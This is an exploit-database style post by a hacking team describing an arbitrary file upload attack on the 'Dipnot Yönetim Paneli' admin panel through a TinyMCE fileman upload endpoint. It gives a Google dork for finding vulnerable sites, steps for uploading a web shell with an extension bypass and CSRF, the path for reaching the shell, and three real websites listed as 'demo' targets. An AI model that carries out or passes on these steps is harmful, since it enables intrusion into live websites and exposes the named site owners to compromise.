***************************************************
# Exploit Title: Dipnot Yönetim Paneli Arbitrary File Upload
# Google Dork: inurl:/dipnotpanel/js/tinymce/plugins/fileman
# Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
# Date: 03/10/2018
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Exploit the site with /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
[+] Upload your file with csrf, post file files[]
[+] Upload shell must with bypass ext
[+] Access the site with /dipnotpanel/js/tinymce/plugins/fileman/Uploads/file.jpg
***************************************************
[+] Demo Site
[+] http://www.mikronmadencilik.com/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
[+] http://www.arinna.com.tr/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
[+] http://www.aegee-eskisehir.org/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
***************************************************
Thanks To Indonesia To World Team